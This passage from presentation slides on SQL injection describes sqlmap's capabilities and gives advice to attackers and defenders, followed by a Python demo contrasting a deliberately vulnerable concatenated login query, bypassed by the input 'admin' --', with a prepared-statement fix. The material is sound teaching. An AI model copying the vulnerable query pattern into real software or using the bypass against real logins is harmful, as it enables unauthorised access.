   - "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)"
   - Unofficially, sqlmap is an AIO (All-In-One) SQL injection tool
   - Over 10,000 repository updates and/or checkouts on a monthly basis
   - Part of the most popular security distributions: BackTrack, BackBox, Web Security Dojo, OWASP Web Testing, ...

21. sqlmap capabilities
   - Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
   - Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Time-based, Stacked
   - Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc.

22. sqlmap capabilities (2)
   - Automatic recognition and cracking of password hashes
   - Support for IDS/WAF evasion in the form of "tampering" scripts
   - Web server file upload/download
   - Arbitrary OS command execution and retrieval of standard console output
   - Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh)
23. Closing words (for attackers)
   - Learn SQL more than "well" – "SQL injection is 100% SQL. The rest is injection"
   - Set up a (virtual) vulnerable environment entirely by yourself – for gaining a better mindset and for possessing a LEGAL assessment testing machine
   - Mimic, with comprehension, what other "attackers" do – including automated tools (e.g. sqlmap)
   - Research defensive mechanisms – for advanced comprehension of the topic

24. Closing words (for defenders)
   - Use (only) prepared SQL statements (bullet-proof against SQL injection attacks)
   - Self-made filtering procedures are prone to common programmer's mistakes (e.g. forgetting to hard type-cast an integer parameter value)
   - Turn off (DBMS) error reports
   - Run with least privilege (a non-admin "query" user)
   - Always expect the worst-case scenario and set up accordingly (e.g. use the GRANT/REVOKE mechanism accordingly)
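The first two defender points side by side, as an added example that is not part of the presentation: the slide 3 concatenation pattern next to the same lookup written as a prepared statement with bound parameters, plus the hard type-cast for an integer parameter. The in-memory SQLite table, the placeholder hash and the function names are assumptions. One caveat worth keeping in mind: binding covers values only; table or column names and ORDER BY directions cannot be bound and need an allow-list, and the least-privilege and error-suppression points are DBMS configuration that SQLite cannot show.

```python
import sqlite3

# Constructed in-memory stand-in for the production DBMS (assumption, not from the
# presentation): one accounts table; the stored hash is a placeholder string.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE accounts (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
INSERT INTO accounts VALUES (1, 'admin', 'placeholder-hash-of-admin-pw');
""")


def login_concat(name, pw_hash):
    """Vulnerable: the slide 3 concatenation pattern. A ' in `name` closes the
    string literal and a trailing -- comments out the password check."""
    sql = ("SELECT COUNT(*) FROM accounts WHERE name = '" + name +
           "' AND pw_hash = '" + pw_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_prepared(name, pw_hash):
    """Fixed: a prepared statement with bound parameters. The statement text never
    changes, so the ' and -- in the input remain part of the value."""
    sql = "SELECT COUNT(*) FROM accounts WHERE name = ? AND pw_hash = ?"
    return conn.execute(sql, (name, pw_hash)).fetchone()[0] > 0


def name_by_id(user_input):
    """Integer parameter: hard type-cast first (the mistake slide 24 warns about is
    skipping this), then still bind it. Non-numeric input such as '1 OR 1=1' is
    rejected before it gets anywhere near the query."""
    try:
        ident = int(user_input)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM accounts WHERE id = ?", (ident,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("concat bypass:  ", login_concat("admin' --", "wrong"))    # True
    print("prepared bypass:", login_prepared("admin' --", "wrong"))  # False
    print("typed lookup:   ", name_by_id("1"), name_by_id("1 OR 1=1"))
```

The same "admin' --" input logs in through the concatenated query and is just an unknown user name for the prepared one; no escaping routine is involved, which is what makes the prepared statement the reliable fix rather than a self-made filter.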
25. Questions?